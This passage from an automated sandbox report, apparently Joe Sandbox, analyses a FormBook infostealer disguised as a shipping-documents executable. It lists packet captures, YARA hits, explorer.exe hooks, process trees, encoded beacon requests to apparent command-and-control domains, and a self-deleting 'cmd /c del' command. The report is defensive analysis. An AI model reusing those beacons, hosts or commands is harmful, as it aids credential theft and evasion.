                                      Nov 20, 2020 08:54:00.798037052 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798048973 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798053026 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798055887 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798074007 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798091888 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798091888 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798113108 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798126936 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798132896 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798151016 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798151016 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798163891 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798182011 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798192978 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798202038 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798219919 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798229933 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798235893 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798254013 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798264027 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798275948 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798283100 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798300028 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798316002 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798330069 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798330069 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798351049 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798358917 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798368931 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798386097 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798398972 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798403025 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798420906 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798419952 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798434973 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798450947 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798461914 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798465967 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798481941 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798494101 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798499107 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798510075 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798515081 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798532009 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798543930 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798548937 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798568964 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798580885 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798587084 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798604012 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798616886 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798619986 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798636913 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798648119 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798651934 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798667908 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798680067 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798685074 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798702955 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798705101 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798723936 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798733950 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798738956 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798755884 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798768044 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798773050 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798788071 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798800945 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798803091 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798819065 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798836946 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798845053 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798855066 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798871994 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798888922 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798890114 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798906088 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798921108 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798935890 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798935890 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798952103 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798969984 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.798981905 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.798986912 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:00.799005032 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:00.799060106 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:05.665817976 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:05.665849924 CET44349699192.185.170.106192.168.2.3
                                      Nov 20, 2020 08:54:05.665956020 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:54:25.291167974 CET49699443192.168.2.3192.185.170.106
                                      Nov 20, 2020 08:55:04.276084900 CET4970680192.168.2.368.70.163.36
                                      Nov 20, 2020 08:55:04.386316061 CET804970668.70.163.36192.168.2.3
                                      Nov 20, 2020 08:55:04.387089014 CET4970680192.168.2.368.70.163.36
                                      Nov 20, 2020 08:55:04.387131929 CET4970680192.168.2.368.70.163.36
                                      Nov 20, 2020 08:55:04.498469114 CET804970668.70.163.36192.168.2.3
                                      Nov 20, 2020 08:55:04.521594048 CET804970668.70.163.36192.168.2.3
                                      Nov 20, 2020 08:55:04.521636009 CET804970668.70.163.36192.168.2.3
                                      Nov 20, 2020 08:55:04.521867037 CET4970680192.168.2.368.70.163.36
                                      Nov 20, 2020 08:55:04.522012949 CET4970680192.168.2.368.70.163.36
                                      Nov 20, 2020 08:55:04.632002115 CET804970668.70.163.36192.168.2.3
                                      Nov 20, 2020 08:55:25.059705973 CET4970780192.168.2.3156.224.66.93
                                      Nov 20, 2020 08:55:25.261904001 CET8049707156.224.66.93192.168.2.3
                                      Nov 20, 2020 08:55:25.262003899 CET4970780192.168.2.3156.224.66.93
                                      Nov 20, 2020 08:55:25.262208939 CET4970780192.168.2.3156.224.66.93
                                      Nov 20, 2020 08:55:25.464425087 CET8049707156.224.66.93192.168.2.3
                                      Nov 20, 2020 08:55:25.760165930 CET4970780192.168.2.3156.224.66.93
                                      Nov 20, 2020 08:55:26.001689911 CET8049707156.224.66.93192.168.2.3
                                      Nov 20, 2020 08:55:31.869110107 CET8049707156.224.66.93192.168.2.3
                                      Nov 20, 2020 08:55:31.869132996 CET8049707156.224.66.93192.168.2.3
                                      Nov 20, 2020 08:55:31.869405985 CET4970780192.168.2.3156.224.66.93
                                      Nov 20, 2020 08:55:31.869430065 CET4970780192.168.2.3156.224.66.93

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Nov 20, 2020 08:53:41.036067009 CET4987353192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:41.071582079 CET53498738.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:42.716921091 CET5319653192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:42.744040966 CET53531968.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:44.888142109 CET5677753192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:44.923767090 CET53567778.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:46.453296900 CET5864353192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:46.480426073 CET53586438.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:47.579297066 CET6098553192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:47.609194994 CET53609858.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:48.411073923 CET5020053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:48.438081026 CET53502008.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:49.291783094 CET5128153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:49.318876028 CET53512818.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:51.135487080 CET4919953192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:51.162585020 CET53491998.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:58.944839001 CET5062053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:58.971955061 CET53506208.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:59.697483063 CET6493853192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:59.732965946 CET53649388.8.8.8192.168.2.3
                                      Nov 20, 2020 08:53:59.744282007 CET6015253192.168.2.38.8.8.8
                                      Nov 20, 2020 08:53:59.771338940 CET53601528.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:01.299463034 CET5754453192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:01.336406946 CET53575448.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:32.659728050 CET5598453192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:32.686847925 CET53559848.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:38.349349976 CET6418553192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:38.376209974 CET53641858.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:39.226186991 CET6511053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:39.253403902 CET53651108.8.8.8192.168.2.3
                                      Nov 20, 2020 08:54:40.286223888 CET5836153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:54:40.313278913 CET53583618.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:04.128407001 CET6349253192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:04.268604040 CET53634928.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:24.721892118 CET6083153192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:25.058480024 CET53608318.8.8.8192.168.2.3
                                      Nov 20, 2020 08:55:45.905834913 CET6010053192.168.2.38.8.8.8
                                      Nov 20, 2020 08:55:46.033629894 CET53601008.8.8.8192.168.2.3

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Nov 20, 2020 08:53:59.697483063 CET192.168.2.38.8.8.80xb712Standard query (0)lifeandhealth.com.mxA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:04.128407001 CET192.168.2.38.8.8.80x7ec8Standard query (0)www.drinksandfruits.comA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:24.721892118 CET192.168.2.38.8.8.80x62ebStandard query (0)www.iatlet.comA (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:45.905834913 CET192.168.2.38.8.8.80x733dStandard query (0)www.leepl.comA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Nov 20, 2020 08:53:59.732965946 CET8.8.8.8192.168.2.30xb712No error (0)lifeandhealth.com.mx192.185.170.106A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:04.268604040 CET8.8.8.8192.168.2.30x7ec8No error (0)www.drinksandfruits.comdrinksandfruits.comCNAME (Canonical name)IN (0x0001)
                                      Nov 20, 2020 08:55:04.268604040 CET8.8.8.8192.168.2.30x7ec8No error (0)drinksandfruits.com68.70.163.36A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:25.058480024 CET8.8.8.8192.168.2.30x62ebNo error (0)www.iatlet.com156.224.66.93A (IP address)IN (0x0001)
                                      Nov 20, 2020 08:55:46.033629894 CET8.8.8.8192.168.2.30x733dNo error (0)www.leepl.comHDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                      Nov 20, 2020 08:55:46.033629894 CET8.8.8.8192.168.2.30x733dNo error (0)HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com3.223.115.185A (IP address)IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.drinksandfruits.com
                                      • www.iatlet.com

                                      HTTP Packets

                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      0192.168.2.34970668.70.163.3680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 20, 2020 08:55:04.387131929 CET378OUTGET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1
                                      Host: www.drinksandfruits.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Nov 20, 2020 08:55:04.521594048 CET378INHTTP/1.1 404 Not Found
                                      Date: Fri, 20 Nov 2020 07:55:04 GMT
                                      Server: Apache
                                      Content-Length: 315
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.349707156.224.66.9380C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Nov 20, 2020 08:55:25.262208939 CET379OUTGET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1
                                      Host: www.iatlet.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Nov 20, 2020 08:55:31.869110107 CET380INHTTP/1.1 200 OK
                                      Date: Fri, 20 Nov 2020 07:55:25 GMT
                                      Server: Apache
                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                      Pragma: no-cache
                                      Connection: close
                                      Set-Cookie: PHPSESSID=i583v17ri483prc4m1vi8lcsh2; path=/
                                      Upgrade: h2
                                      Connection: Upgrade
                                      Content-Length: 0
                                      Content-Type: text/html; charset=gbk


                                      HTTPS Packets

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Nov 20, 2020 08:54:00.029365063 CET192.185.170.106443192.168.2.349699CN=webdisk.lifeandhealth.com.mx CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Fri Nov 06 17:15:38 CET 2020 Thu Mar 17 17:40:46 CET 2016Thu Feb 04 17:15:38 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                      CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                                      Code Manipulations

                                      User Modules

                                      Hook Summary

                                      Function NameHook TypeActive in Processes
                                      PeekMessageAINLINEexplorer.exe
                                      PeekMessageWINLINEexplorer.exe
                                      GetMessageWINLINEexplorer.exe
                                      GetMessageAINLINEexplorer.exe

                                      Processes

                                      Process: explorer.exe, Module: user32.dll
                                      Function NameHook TypeNew Data
                                      PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED
                                      PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                      GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xED
                                      GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xED

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: Shipping Documents (INV,PL,BL)_pdf.exe PID: 2540 Parent PID: 5688

                                      General

                                      Start time:08:53:37
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Visual Basic
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: Shipping Documents (INV,PL,BL)_pdf.exe PID: 5268 Parent PID: 2540

                                      General

                                      Start time:08:53:48
                                      Start date:20/11/2020
                                      Path:C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0x7ffb73670000
                                      File size:86016 bytes
                                      MD5 hash:AED402D9A5675F5796265E5170ADA7CB
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: explorer.exe PID: 3388 Parent PID: 5268

                                      General

                                      Start time:08:54:04
                                      Start date:20/11/2020
                                      Path:C:\Windows\explorer.exe
                                      Wow64 process (32bit):false
                                      Commandline:
                                      Imagebase:0x7ff714890000
                                      File size:3933184 bytes
                                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: wlanext.exe PID: 5896 Parent PID: 3388

                                      General

                                      Start time:08:54:18
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\wlanext.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\wlanext.exe
                                      Imagebase:0xc90000
                                      File size:78848 bytes
                                      MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: LokiBot_Dropper_Packed_R11_Feb18, Description: Auto-generated rule - file scan copy.pdf.r11, Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, Author: Florian Roth
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 6040 Parent PID: 5896

                                      General

                                      Start time:08:54:22
                                      Start date:20/11/2020
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe'
                                      Imagebase:0xbd0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 5980 Parent PID: 6040

                                      General

                                      Start time:08:54:23
                                      Start date:20/11/2020
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff6b2800000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: Shipping Documents (INV,PL,BL)_pdf.exe PID: 2540 Parent PID: 5688 Shipping Documents (INV,PL,BL)_pdf.exeCOMMON

                                        Executed Functions

                                        Function 020F0A5C, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 166nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID: 1.!T$E$E$f
                                        • API String ID: 4046476035-3436754365
                                        • Opcode ID: 51b2f3e834691b644ccace6f5cd05cc292678a46cea99e9fe59a883da36db859
                                        • Instruction ID: 473ca7831bb0a072533cccf3a6c128d071604d7725b030b8c7c381e54bb1ec4d
                                        • Opcode Fuzzy Hash: 51b2f3e834691b644ccace6f5cd05cc292678a46cea99e9fe59a883da36db859
                                        • Instruction Fuzzy Hash: 325189A4A887C55BFBA296344C513DD7FA25F02398FAC01AECF911F8C2E7698843D741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F0517, Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 514nativethreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,020F09FC,00000000,00000000,00000000,00000000), ref: 020F0A92
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.241785192.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false
                                        Similarity
                                        • API ID: InformationThread
                                        • String ID: 1.!T
                                        • API String ID: 4046476035-3147410236
                                        • Opcode ID: 9b0c02af048be3da6cbca41435fd6bb1d56eb5a682729380bc4067abaa20e705
                                        • Instruction ID: 43d0c40007373bd092932e41a3283505c56caaa37009131135305f533f983ae4
                                        • Opcode Fuzzy Hash: 9b0c02af048be3da6cbca41435fd6bb1d56eb5a682729380bc4067abaa20e705
                                        • Instruction Fuzzy Hash: 15F199707C4346AAFBA11F24CC917EE3AA7AF01764F944129EF415B9C1D3B98885EB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 020F39A2, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 225librarynativeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • NtWriteVirtualMemory.NTDLL(?,00000000,?,00000000,?,?,?,?,00000000,?,00001000,00000040,?,00000000,?,?), ref: 020F3E21
                                        • LoadLibraryA.KERNELBASE(?,082962C8,?,020F096B,00000000,?,?), ref: 020F7132
                                        Strings
                                        Memory Dump Source
